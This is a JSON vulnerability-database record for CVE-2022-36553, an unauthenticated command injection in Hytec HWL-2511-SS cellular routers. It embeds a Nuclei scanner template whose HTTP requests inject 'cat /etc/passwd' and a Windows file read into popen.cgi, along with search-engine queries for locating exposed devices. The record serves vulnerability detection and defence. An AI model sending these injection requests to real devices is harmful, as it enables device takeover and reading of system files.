{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-36553/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-36553/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-36553/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-36553/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-36553/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-36553"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-36553"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.90902,
      "kev": false,
      "percentile": 0.99804
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2022/CVE-2022-36553.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2022-36553\n\ninfo:\n  name: Hytec Inter HWL-2511-SS - Remote Command Execution\n  author: HuTa0\n  severity: critical\n  description: |\n    Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.\n  impact: |\n    Unauthenticated attackers can execute arbitrary commands on the Hytec Inter HWL-2511-SS cellular router through command injection in the popen.cgi endpoint, potentially gaining complete control over the device and connected network infrastructure.\n  remediation: |\n    Update Hytec Inter HWL-2511-SS firmware to a version later than 1.05 that properly sanitizes command parameters in popen.cgi.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-36553\n    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/cellular-router-rce.yaml\n    - https://gist.github.com/Nwqda/b27418ab801eb0b9cdbe8d042cb0249b\n    - https://hytec.co.jp/eng/products/our-brand/hwl-2511-ss.html\n    - https://hytec.co.jp/eng/wordpress/wp-content/uploads/2019/09/hwl-2511-ss-ds.3.0.pdf\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-36553\n    cwe-id: CWE-77\n    epss-score: 0.90902\n    epss-percentile: 0.99804\n    cpe: cpe:2.3:o:hytec:hwl-2511-ss_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 4\n    vendor: hytec\n    product: hwl-2511-ss_firmware\n    fofa-query: title=\"index\" && header=\"lighttpd/1.4.30\"\n    zoomeye-query: app=\"Hytec Inter HWL-2511-SS\"\n  tags: cve2022,cve,hytec,rce,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1\n        Host: {{Hostname}}\n\n    payloads:\n      command:\n        - \"cat%20/etc/passwd\"\n        - \"type%20C://Windows/win.ini\"\n    stop-at-first-match: true\n\n    matchers-condition: or\n    matchers:\n      - type: dsl\n        dsl:\n          - \"regex('root:.*:0:0:', body)\"\n          - \"contains(body_1, '<title>index</title>')\"\n          - \"status_code == 200\"\n        condition: and\n\n      - type: dsl\n        dsl:\n          - \"contains(body, 'bit app support')\"\n          - \"contains(body, 'fonts')\"\n          - \"contains(body, 'extensions')\"\n          - \"status_code == 200\"\n          - \"contains(body_1, '<title>index</title>')\"\n        condition: and\n# digest: 4b0a00483046022100d170e0f96c99e71dd1fc23e4d9f49f9725f7ab1d2b31792bd0377efa31b077bf022100ee3261eabdaccc7fc8a9ac8179b6661c316e0a2907d6561ecb975f89bbd11a81:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2022-36553"
}